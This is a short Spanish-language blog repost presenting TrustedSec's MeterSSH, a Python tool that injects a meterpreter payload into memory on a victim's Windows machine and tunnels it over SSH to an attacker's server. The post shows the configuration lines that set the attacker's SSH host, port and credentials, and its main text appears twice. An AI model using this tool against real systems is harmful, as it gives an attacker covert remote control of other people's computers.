MeterSSH de TrustedSec
es una manera fácil de inyectar código shell nativo en memoria y
llevarlo al atacante a través de un túnel SSH. Todo con un único fichero
Python que se puede convertir fácilmente en ejecutable usando PyInstaller o py2exe.
Sólo hay que editar el archivo meterssh.py y añadir la IP del servidor SSH, el puerto, el nombre de usuario y la contraseña:
user = “sshuser”
# password for SSH
password = “sshpw”
# this is where your SSH server is running
rhost = “192.168.1.1”
# remote SSH port – this is the attackers SSH server
port = “22”
Al ejecutarlo en la máquina de la víctima se lanzará un meterpreter mediante inyección en memoria (en este caso windows/meterpreter/bind_tcp) y lo asociará al puerto 8021 tunelizándolo con el módulo ssh Paramiko:
Después en el servidor del atacante ejecutaremos monitor.py para supervisar la conexión SSH y el shell hasta iniciar automáticamente Metasploit:
Puedes descargar meterssh de la página de Github:
https://github.com/trustedsec/meterssh
Sólo hay que editar el archivo meterssh.py y añadir la IP del servidor SSH, el puerto, el nombre de usuario y la contraseña:
user = “sshuser”
# password for SSH
password = “sshpw”
# this is where your SSH server is running
rhost = “192.168.1.1”
# remote SSH port – this is the attackers SSH server
port = “22”
Al ejecutarlo en la máquina de la víctima se lanzará un meterpreter mediante inyección en memoria (en este caso windows/meterpreter/bind_tcp) y lo asociará al puerto 8021 tunelizándolo con el módulo ssh Paramiko:
Después en el servidor del atacante ejecutaremos monitor.py para supervisar la conexión SSH y el shell hasta iniciar automáticamente Metasploit:
Puedes descargar meterssh de la página de Github:
https://github.com/trustedsec/meterssh
___________________________________________________
Tomado de: http://www.hackplayers.com/2014/11/meterssh-meterpreter-sobre-ssh.html
Se respetan derechos de autor